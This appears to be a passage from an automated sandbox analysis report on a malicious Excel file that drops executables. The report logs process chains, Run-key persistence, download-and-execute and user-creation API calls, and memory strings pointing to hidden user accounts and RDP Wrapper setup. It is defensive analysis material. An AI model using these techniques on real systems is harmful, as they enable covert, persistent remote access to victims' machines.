                Source: C:\ProgramData\msimages.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\ProgramData\msimages.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\ProgramData\msimages.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\ProgramData\msimages.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\ProgramData\msimages.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\ProgramData\msimages.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\ProgramData\msimages.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\ProgramData\msimages.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\ProgramData\msimages.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\ProgramData\msimages.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\ProgramData\msimages.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\ProgramData\msimages.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\ProgramData\msimages.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\ProgramData\msimages.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\ProgramData\msimages.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\ProgramData\msimages.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: Estado.de.cuenta.xlsReversingLabs: Detection: 50%
                Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\VPZVQXDUT.exe "C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\VPZVQXDUT.exe"
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\VPZVQXDUT.exeProcess created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\VPZVQXDUT.exe C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\VPZVQXDUT.exe
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\VPZVQXDUT.exeProcess created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\VPZVQXDUT.exe C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\VPZVQXDUT.exe
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\VPZVQXDUT.exeProcess created: C:\ProgramData\msimages.exe "C:\ProgramData\msimages.exe"
                Source: C:\ProgramData\msimages.exeProcess created: C:\ProgramData\msimages.exe C:\ProgramData\msimages.exe
                Source: C:\ProgramData\msimages.exeProcess created: C:\ProgramData\msimages.exe C:\ProgramData\msimages.exe
                Source: unknownProcess created: C:\ProgramData\msimages.exe "C:\ProgramData\msimages.exe"
                Source: C:\ProgramData\msimages.exeProcess created: C:\ProgramData\msimages.exe C:\ProgramData\msimages.exe
                Source: C:\ProgramData\msimages.exeProcess created: C:\ProgramData\msimages.exe C:\ProgramData\msimages.exe
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\VPZVQXDUT.exe "C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\VPZVQXDUT.exe" Jump to behavior
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\VPZVQXDUT.exeProcess created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\VPZVQXDUT.exe C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\VPZVQXDUT.exeJump to behavior
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\VPZVQXDUT.exeProcess created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\VPZVQXDUT.exe C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\VPZVQXDUT.exeJump to behavior
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\VPZVQXDUT.exeProcess created: C:\ProgramData\msimages.exe "C:\ProgramData\msimages.exe"Jump to behavior
                Source: C:\ProgramData\msimages.exeProcess created: C:\ProgramData\msimages.exe C:\ProgramData\msimages.exeJump to behavior
                Source: C:\ProgramData\msimages.exeProcess created: C:\ProgramData\msimages.exe C:\ProgramData\msimages.exeJump to behavior
                Source: C:\ProgramData\msimages.exeProcess created: C:\ProgramData\msimages.exe C:\ProgramData\msimages.exeJump to behavior
                Source: C:\ProgramData\msimages.exeProcess created: C:\ProgramData\msimages.exe C:\ProgramData\msimages.exeJump to behavior
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\VPZVQXDUT.exeSection loaded: wow64win.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\VPZVQXDUT.exeSection loaded: wow64cpu.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\VPZVQXDUT.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\VPZVQXDUT.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\VPZVQXDUT.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\VPZVQXDUT.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\VPZVQXDUT.exeSection loaded: bcrypt.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\VPZVQXDUT.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\VPZVQXDUT.exeSection loaded: rpcrtremote.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\VPZVQXDUT.exeSection loaded: wow64win.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\VPZVQXDUT.exeSection loaded: wow64cpu.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\VPZVQXDUT.exeSection loaded: wow64win.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\VPZVQXDUT.exeSection loaded: wow64cpu.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\VPZVQXDUT.exeSection loaded: bcrypt.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\VPZVQXDUT.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\VPZVQXDUT.exeSection loaded: netapi32.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\VPZVQXDUT.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\VPZVQXDUT.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\VPZVQXDUT.exeSection loaded: wkscli.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\VPZVQXDUT.exeSection loaded: samcli.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\VPZVQXDUT.exeSection loaded: winmm.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\VPZVQXDUT.exeSection loaded: ntmarta.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\VPZVQXDUT.exeSection loaded: msdmo.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\VPZVQXDUT.exeSection loaded: avicap32.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\VPZVQXDUT.exeSection loaded: msvfw32.dllJump to behavior
                Source: C:\ProgramData\msimages.exeSection loaded: wow64win.dllJump to behavior
                Source: C:\ProgramData\msimages.exeSection loaded: wow64cpu.dllJump to behavior
                Source: C:\ProgramData\msimages.exeSection loaded: version.dllJump to behavior
                Source: C:\ProgramData\msimages.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\ProgramData\msimages.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\ProgramData\msimages.exeSection loaded: amsi.dllJump to behavior
                Source: C:\ProgramData\msimages.exeSection loaded: bcrypt.dllJump to behavior
                Source: C:\ProgramData\msimages.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\ProgramData\msimages.exeSection loaded: rpcrtremote.dllJump to behavior
                Source: C:\ProgramData\msimages.exeSection loaded: wow64win.dllJump to behavior
                Source: C:\ProgramData\msimages.exeSection loaded: wow64cpu.dllJump to behavior
                Source: C:\ProgramData\msimages.exeSection loaded: bcrypt.dllJump to behavior
                Source: C:\ProgramData\msimages.exeSection loaded: version.dllJump to behavior
                Source: C:\ProgramData\msimages.exeSection loaded: netapi32.dllJump to behavior
                Source: C:\ProgramData\msimages.exeSection loaded: netutils.dllJump to behavior
                Source: C:\ProgramData\msimages.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\ProgramData\msimages.exeSection loaded: wkscli.dllJump to behavior
                Source: C:\ProgramData\msimages.exeSection loaded: samcli.dllJump to behavior
                Source: C:\ProgramData\msimages.exeSection loaded: winmm.dllJump to behavior
                Source: C:\ProgramData\msimages.exeSection loaded: ntmarta.dllJump to behavior
                Source: C:\ProgramData\msimages.exeSection loaded: msdmo.dllJump to behavior
                Source: C:\ProgramData\msimages.exeSection loaded: avicap32.dllJump to behavior
                Source: C:\ProgramData\msimages.exeSection loaded: msvfw32.dllJump to behavior
                Source: C:\ProgramData\msimages.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\ProgramData\msimages.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\ProgramData\msimages.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\ProgramData\msimages.exeSection loaded: dhcpcsvc6.dllJump to behavior
                Source: C:\ProgramData\msimages.exeSection loaded: dhcpcsvc.dllJump to behavior
                Source: C:\ProgramData\msimages.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\ProgramData\msimages.exeSection loaded: wbemcomn2.dllJump to behavior
                Source: C:\ProgramData\msimages.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\ProgramData\msimages.exeSection loaded: rpcrtremote.dllJump to behavior
                Source: C:\ProgramData\msimages.exeSection loaded: ntdsapi.dllJump to behavior
                Source: C:\ProgramData\msimages.exeSection loaded: wow64win.dllJump to behavior
                Source: C:\ProgramData\msimages.exeSection loaded: wow64cpu.dllJump to behavior
                Source: C:\ProgramData\msimages.exeSection loaded: bcrypt.dllJump to behavior
                Source: C:\ProgramData\msimages.exeSection loaded: version.dllJump to behavior
                Source: C:\ProgramData\msimages.exeSection loaded: netapi32.dllJump to behavior
                Source: C:\ProgramData\msimages.exeSection loaded: netutils.dllJump to behavior
                Source: C:\ProgramData\msimages.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\ProgramData\msimages.exeSection loaded: wkscli.dllJump to behavior
                Source: C:\ProgramData\msimages.exeSection loaded: samcli.dllJump to behavior
                Source: C:\ProgramData\msimages.exeSection loaded: winmm.dllJump to behavior
                Source: C:\ProgramData\msimages.exeSection loaded: ntmarta.dllJump to behavior
                Source: C:\ProgramData\msimages.exeSection loaded: msdmo.dllJump to behavior
                Source: C:\ProgramData\msimages.exeSection loaded: avicap32.dllJump to behavior
                Source: C:\ProgramData\msimages.exeSection loaded: msvfw32.dllJump to behavior
                Source: C:\ProgramData\msimages.exeSection loaded: wow64win.dllJump to behavior
                Source: C:\ProgramData\msimages.exeSection loaded: wow64cpu.dllJump to behavior
                Source: C:\ProgramData\msimages.exeSection loaded: version.dllJump to behavior
                Source: C:\ProgramData\msimages.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\ProgramData\msimages.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\ProgramData\msimages.exeSection loaded: amsi.dllJump to behavior
                Source: C:\ProgramData\msimages.exeSection loaded: bcrypt.dllJump to behavior
                Source: C:\ProgramData\msimages.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\ProgramData\msimages.exeSection loaded: rpcrtremote.dllJump to behavior
                Source: C:\ProgramData\msimages.exeSection loaded: wow64win.dllJump to behavior
                Source: C:\ProgramData\msimages.exeSection loaded: wow64cpu.dllJump to behavior
                Source: C:\ProgramData\msimages.exeSection loaded: bcrypt.dllJump to behavior
                Source: C:\ProgramData\msimages.exeSection loaded: version.dllJump to behavior
                Source: C:\ProgramData\msimages.exeSection loaded: netapi32.dllJump to behavior
                Source: C:\ProgramData\msimages.exeSection loaded: netutils.dllJump to behavior
                Source: C:\ProgramData\msimages.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\ProgramData\msimages.exeSection loaded: wkscli.dllJump to behavior
                Source: C:\ProgramData\msimages.exeSection loaded: samcli.dllJump to behavior
                Source: C:\ProgramData\msimages.exeSection loaded: winmm.dllJump to behavior
                Source: C:\ProgramData\msimages.exeSection loaded: ntmarta.dllJump to behavior
                Source: C:\ProgramData\msimages.exeSection loaded: msdmo.dllJump to behavior
                Source: C:\ProgramData\msimages.exeSection loaded: avicap32.dllJump to behavior
                Source: C:\ProgramData\msimages.exeSection loaded: msvfw32.dllJump to behavior
                Source: C:\ProgramData\msimages.exeSection loaded: wow64win.dllJump to behavior
                Source: C:\ProgramData\msimages.exeSection loaded: wow64cpu.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\VPZVQXDUT.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{62BE5D10-60EB-11D0-BD3B-00A0C911CE86}\InprocServer32Jump to behavior
                Source: Window RecorderWindow detected: More than 3 window changes detected
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\VPZVQXDUT.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItemsJump to behavior
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\VPZVQXDUT.exeDirectory created: C:\Program Files\Microsoft DN1Jump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\VPZVQXDUT.exeCode function: 6_2_0040FA42 LoadLibraryA,GetProcAddress,6_2_0040FA42
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\VPZVQXDUT.exeCode function: 6_2_00401190 push eax; ret 6_2_004011A4
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\VPZVQXDUT.exeCode function: 6_2_00401190 push eax; ret 6_2_004011CC
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\VPZVQXDUT.exeCode function: 6_2_004144B1 push ebp; retf 6_2_00414564
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\VPZVQXDUT.exeCode function: 6_2_00414550 push ebp; retf 6_2_00414564
                Source: asxhfzdhhz[1].exe.0.drStatic PE information: section name: .text entropy: 7.983431389204728
                Source: VPZVQXDUT.exe.0.drStatic PE information: section name: .text entropy: 7.983431389204728
                Source: msimages.exe.6.drStatic PE information: section name: .text entropy: 7.983431389204728
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\VPZVQXDUT.exeCode function: 6_2_0040D418 NetUserAdd,NetLocalGroupAddMembers,6_2_0040D418
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\VPZVQXDUT.exeCode function: 6_2_004027D3 URLDownloadToFileW,ShellExecuteW,6_2_004027D3
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\VPZVQXDUT.exeFile created: C:\ProgramData\msimages.exeJump to dropped file
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\asxhfzdhhz[1].exeJump to dropped file
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\VPZVQXDUT.exeJump to dropped file
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\VPZVQXDUT.exeFile created: C:\ProgramData\msimages.exeJump to dropped file
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\VPZVQXDUT.exeCode function: 6_2_0040AC0A lstrcatW,GetBinaryTypeW,CopyFileW,PathFileExistsW,GetPrivateProfileStringW,6_2_0040AC0A
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\VPZVQXDUT.exeCode function: 6_2_0040A6C8 GetBinaryTypeW,CopyFileW,PathFileExistsW,GetPrivateProfileStringW,6_2_0040A6C8
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\VPZVQXDUT.exeCode function: 6_2_0040D508 OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,GetLastError,Sleep,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,6_2_0040D508
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\VPZVQXDUT.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run msimagesJump to behavior
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\VPZVQXDUT.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run msimagesJump to behavior

                Hooking and other Techniques for Hiding and Protection

                barindex
                Contains functionality to hide user accounts
                Source: VPZVQXDUT.exe, 00000004.00000002.370971406.0000000003C6D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
                Source: VPZVQXDUT.exe, 00000004.00000002.370971406.0000000003C6D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: UEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEETermService%ProgramFiles%%windir%\System32%ProgramW6432%\Microsoft DN1\rfxvmt.dll\rdpwrap.ini\sqlmap.dllrudprpdpSOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserListSeDebugPrivilegeSYSTEM\CurrentControlSet\Services\TermService\ParametersServiceDllSYSTEM\CurrentControlSet\Services\TermServiceImagePathsvchost.exesvchost.exe -kCertPropSvcSessionEnvServicesActiveSYSTEM\CurrentControlSet\Control\Terminal ServerSYSTEM\CurrentControlSet\Control\Terminal Server\Licensing CoreSOFTWARE\Microsoft\Windows NT\CurrentVersion\WinlogonSYSTEM\CurrentControlSet\Control\Terminal Server\AddInsSYSTEM\CurrentControlSet\ControlTerminal Server\AddIns\Clip RedirectorSYSTEM\CurrentControlSet\Control\Terminal Server\AddIns\Dynamic VCfDenyTSConnectionsEnableConcurrentSessionsAllowMultipleTSSessionsRDPClipNameType
                Source: VPZVQXDUT.exe, 00000004.00000002.370788761.0000000002789000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
                Source: VPZVQXDUT.exe, 00000004.00000002.370788761.0000000002789000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: UEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEETermService%ProgramFiles%%windir%\System32%ProgramW6432%\Microsoft DN1\rfxvmt.dll\rdpwrap.ini\sqlmap.dllrudprpdpSOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserListSeDebugPrivilegeSYSTEM\CurrentControlSet\Services\TermService\ParametersServiceDllSYSTEM\CurrentControlSet\Services\TermServiceImagePathsvchost.exesvchost.exe -kCertPropSvcSessionEnvServicesActiveSYSTEM\CurrentControlSet\Control\Terminal ServerSYSTEM\CurrentControlSet\Control\Terminal Server\Licensing CoreSOFTWARE\Microsoft\Windows NT\CurrentVersion\WinlogonSYSTEM\CurrentControlSet\Control\Terminal Server\AddInsSYSTEM\CurrentControlSet\ControlTerminal Server\AddIns\Clip RedirectorSYSTEM\CurrentControlSet\Control\Terminal Server\AddIns\Dynamic VCfDenyTSConnectionsEnableConcurrentSessionsAllowMultipleTSSessionsRDPClipNameType
                Source: VPZVQXDUT.exe, 00000004.00000002.370788761.0000000002391000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
                Source: VPZVQXDUT.exe, 00000004.00000002.370788761.0000000002391000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: UEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEETermService%ProgramFiles%%windir%\System32%ProgramW6432%\Microsoft DN1\rfxvmt.dll\rdpwrap.ini\sqlmap.dllrudprpdpSOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserListSeDebugPrivilegeSYSTEM\CurrentControlSet\Services\TermService\ParametersServiceDllSYSTEM\CurrentControlSet\Services\TermServiceImagePathsvchost.exesvchost.exe -kCertPropSvcSessionEnvServicesActiveSYSTEM\CurrentControlSet\Control\Terminal ServerSYSTEM\CurrentControlSet\Control\Terminal Server\Licensing CoreSOFTWARE\Microsoft\Windows NT\CurrentVersion\WinlogonSYSTEM\CurrentControlSet\Control\Terminal Server\AddInsSYSTEM\CurrentControlSet\ControlTerminal Server\AddIns\Clip RedirectorSYSTEM\CurrentControlSet\Control\Terminal Server\AddIns\Dynamic VCfDenyTSConnectionsEnableConcurrentSessionsAllowMultipleTSSessionsRDPClipNameType
                Source: VPZVQXDUT.exeString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
                Source: VPZVQXDUT.exe, 00000006.00000002.374015317.0000000000400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
                Source: VPZVQXDUT.exe, 00000006.00000002.374015317.0000000000400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: UEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEETermService%ProgramFiles%%windir%\System32%ProgramW6432%\Microsoft DN1\rfxvmt.dll\rdpwrap.ini\sqlmap.dllrudprpdpSOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserListSeDebugPrivilegeSYSTEM\CurrentControlSet\Services\TermService\ParametersServiceDllSYSTEM\CurrentControlSet\Services\TermServiceImagePathsvchost.exesvchost.exe -kCertPropSvcSessionEnvServicesActiveSYSTEM\CurrentControlSet\Control\Terminal ServerSYSTEM\CurrentControlSet\Control\Terminal Server\Licensing CoreSOFTWARE\Microsoft\Windows NT\CurrentVersion\WinlogonSYSTEM\CurrentControlSet\Control\Terminal Server\AddInsSYSTEM\CurrentControlSet\ControlTerminal Server\AddIns\Clip RedirectorSYSTEM\CurrentControlSet\Control\Terminal Server\AddIns\Dynamic VCfDenyTSConnectionsEnableConcurrentSessionsAllowMultipleTSSessionsRDPClipNameType
                Source: msimages.exe, 0000000B.00000002.377093347.0000000002998000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
                Source: msimages.exe, 0000000B.00000002.377093347.0000000002998000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: UEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEETermService%ProgramFiles%%windir%\System32%ProgramW6432%\Microsoft DN1\rfxvmt.dll\rdpwrap.ini\sqlmap.dllrudprpdpSOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserListSeDebugPrivilegeSYSTEM\CurrentControlSet\Services\TermService\ParametersServiceDllSYSTEM\CurrentControlSet\Services\TermServiceImagePathsvchost.exesvchost.exe -kCertPropSvcSessionEnvServicesActiveSYSTEM\CurrentControlSet\Control\Terminal ServerSYSTEM\CurrentControlSet\Control\Terminal Server\Licensing CoreSOFTWARE\Microsoft\Windows NT\CurrentVersion\WinlogonSYSTEM\CurrentControlSet\Control\Terminal Server\AddInsSYSTEM\CurrentControlSet\ControlTerminal Server\AddIns\Clip RedirectorSYSTEM\CurrentControlSet\Control\Terminal Server\AddIns\Dynamic VCfDenyTSConnectionsEnableConcurrentSessionsAllowMultipleTSSessionsRDPClipNameType
                Source: msimages.exe, 0000000B.00000002.377093347.00000000029B7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
                Source: msimages.exe, 0000000B.00000002.377093347.00000000029B7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: UEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEETermService%ProgramFiles%%windir%\System32%ProgramW6432%\Microsoft DN1\rfxvmt.dll\rdpwrap.ini\sqlmap.dllrudprpdpSOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserListSeDebugPrivilegeSYSTEM\CurrentControlSet\Services\TermService\ParametersServiceDllSYSTEM\CurrentControlSet\Services\TermServiceImagePathsvchost.exesvchost.exe -kCertPropSvcSessionEnvServicesActiveSYSTEM\CurrentControlSet\Control\Terminal ServerSYSTEM\CurrentControlSet\Control\Terminal Server\Licensing CoreSOFTWARE\Microsoft\Windows NT\CurrentVersion\WinlogonSYSTEM\CurrentControlSet\Control\Terminal Server\AddInsSYSTEM\CurrentControlSet\ControlTerminal Server\AddIns\Clip RedirectorSYSTEM\CurrentControlSet\Control\Terminal Server\AddIns\Dynamic VCfDenyTSConnectionsEnableConcurrentSessionsAllowMultipleTSSessionsRDPClipNameType
                Source: msimages.exe, 0000000E.00000002.402208161.0000000002996000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
